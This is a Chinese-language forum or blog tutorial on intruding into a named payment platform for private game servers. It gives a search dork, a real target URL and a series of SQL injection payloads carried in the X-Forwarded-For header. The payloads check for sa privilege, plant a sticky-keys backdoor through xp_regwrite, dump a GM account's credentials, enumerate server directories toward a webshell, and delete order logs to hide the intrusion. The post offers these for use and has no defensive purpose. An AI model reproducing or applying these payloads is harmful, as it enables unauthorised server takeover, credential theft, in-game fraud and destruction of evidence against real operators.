入侵传奇私服支付平台的方法
今天给大家带来的是入侵传奇私服支付平台。
google 搜索关键字
由于时间关系 我先找了一个站。
inurl:buy/fq.asp?gid=cq
算了这个站没开3389 也难得搞下去。站我已经找好了 。。
就这个 http://www.pay39.net/buy/fq.asp?gid=cq&uid=514
下单抓包 改包 我们先测试下是不是sa 权限。免得浪费时间。
inurl:buy/fq.asp?gid=cq
检测权限
X-Forwarded-For: 11','1','1','1','1',cast(system_user as int));--
[Microsoft][ODBC SQL Server Driver][SQL Server]将 nvarchar 值 'sa' 转换为数据类型为 int 的列时发生语法错误。 呵呵 不错。 开了3389 我们替换他的shift
X-Forwarded-For: 11','1','1','1','1','1');exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWAREMicrosoftWindows NTCurrentVersionImage File Execution Optionssethc.exe','debugger','REG_sz','c:windowssystem32cmd.exe on';--
返回无错。。执行成功。接下来 想干啥就干啥 加账户 进服务器。。或者查找平台上的gm 账户密码 给自己游戏里发元宝。。。。。
我下面也准备好了 如果不是sa 的情况下 怎么继续入侵 拿webshell.
爆出平台指定id的账户密码(显示在指定订单的充值卡号上)
X-Forwarded-For: 11','1','1','1','1','1');update mobile1 set usercode=(select username+'|'+passwd from member where id=543) where num='2012011203422546319'--
// num为自己下单的订单号,此处id为游戏平台gm账户id,
第一步:建立表
X-Forwarded-For: 11','1','1','1','1','1');drop table foofoofoo;create table foofoofoo([id] [int] identity (1,1) not null,[name] [nvarchar] (300) not null,[depth] [int] not null,[isfile] [nvarchar] (50) null);--
第二步
X-Forwarded-For: 11','1','1','1','1','1');declare @z nvarchar(4000) set @z=0x65003A005C00 insert foofoofoo execute master..xp_dirtree @z,1,1--
//注意:0x63003a005c00 = C: 为sql ENCODE
d: 0x64003A005C00
第三步 暴出总数
X-Forwarded-For: 11','1','1','1','1','1');update mobile1 set usercode=(select cast(count(*) as varchar(8000))+char(94) from foofoofoo) where num='2012011203422546319'--
第四步:暴出你想要的文件夹名字和文件名字
X-Forwarded-For: 11','1','1','1','1','1');update mobile1 set usercode=(select top 1 cast([isfile] as nvarchar(4000))+char(94)+cast([name] as nvarchar(4000)) from (select distinct top 1 * from foofoofoo order by isfile,name) t order by isfile desc,name desc) where num='2012011203422546319'--
修改distinct后面的数字,依次爆出。
一直爆 找到站点目录 然后备份木马到站点目录 就可以拿到webshell 时间关系我就不演示了。
谢谢观赏。。
by ko高祖
附带删除 下单日志
X-Forwarded-For: 11','1','1','1','1','1');delete from mobile1 where number='自己下单时候的账户'--
- 上一篇文章:权限10的脚本变量命令的用法详解
- 下一篇文章:1.95圣灵全新道霸异世轻变刷元宝与金刚石漏洞